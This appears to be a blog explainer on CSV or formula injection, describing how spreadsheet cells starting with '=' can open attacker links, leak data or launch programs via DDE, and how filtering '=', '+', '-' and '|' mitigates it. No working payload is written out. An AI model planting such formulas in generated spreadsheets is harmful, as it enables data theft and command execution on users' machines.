CSV Injection



What is a CSV file?

A CSV(Comma Separated Value) file stores tabular data in plain text. Each record consists of one or more fields which are separated by commas. CSVs look like a garden-variety spreadsheet but with a .csv extension. CSV files can be used with most any spreadsheet program, such as Microsoft Excel or Google Spreadsheets.



What is CSV Injection?

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. Such input can be maliciously crafted to break the data/code barrier in spreadsheet software and result in unintended command and program execution.

Whenever Excel or LibreOffice Calc is used to open a CSV file, any cell which stars with a ”=” is interpreted as a formula by the software.

Here, we have an example of multiplying 2 values with the help of an inbuilt function.



You might wonder how these simple functions can be dangerous to the targeted system. The problem lies with how the software processes a CSV file. It first parses and processes the formulas which begin with “=” before it displays any content to the user. These formulas may contain a call to a system function or may contain a malicious payload which can exploit the victim’s system or leak the data 



How Does this effect the User?

CSV Injection can effect the user in the following ways:

First, the user can click on a hyperlink present inside the spreadsheet. The hyperlink is created with the help of “=”. On clicking the link, the user can be made to open up any link/file residing in the attacker’s server. The attacker will also be able to steal the data available in the spreadsheet.

Also, the formula can be executed as soon as the spreadsheet is opened. This way the user has no control over it and the execution cannot stopped. Any program can be opened by the attacker on his will. This can also result into a DOS attack by using the user’s system and opening CMD with the help of the function.


Examples:

 We can create a hyperlink function which creates a shortcut or jump that opens a document stored on a network server, an intranet, or the Internet. When you click the cell that contains the hyperlink function, MS Excel opens the file that is stored at link location.

The following is an example where we have linked google to the website. Similarly we can link some malicious site and send private data along with it.




We can also use a basic exploit with Dynamic Data Exchange. Dynamic Data Exchange (DDE) is an inter-process communication system which allows data to be communicated or shared between the applications in operating systems such as Windows. Dynamic Data Exchange makes use of shared memory and a set of commands, message formats and protocols for communication and sharing.

The following is an example to open notepad. In a similar way they can use malicious commands with the help of CMD.

For prevention of this excel gives us a warning:



How to prevent it?

It is the responsibility of the spreadsheet applications to prevent such attacks. However, web applications can take a stand to not allow any values starting with the special characters mentioned above. In order to prevent such an injection, the applications can append a Quote(‘) in the beginning of the cell on detecting such a vulnerable value.

Libre office does it in the following way:




It can be seen that "|" was converted into ";" and thus we got an error and the command didn't execute

Conclusion

CSV injection is a very dangerous and often overlooked attack vector that can have devastating effects on people, regardless of where this attack takes place. Also, for the successful execution of the formula, attacker will have to use the ‘-‘ , ‘=’ , and the pipe (|) is used to execute the binary in the excel software. Hence, it is strongly recommended to filter the ‘- ‘, ‘|’ , ‘+’ and  ‘=’  to mitigate this vulnerability. Also, since this attack is difficult to mitigate, it is disallowed from quite a few bug bounty programs.






0 Comments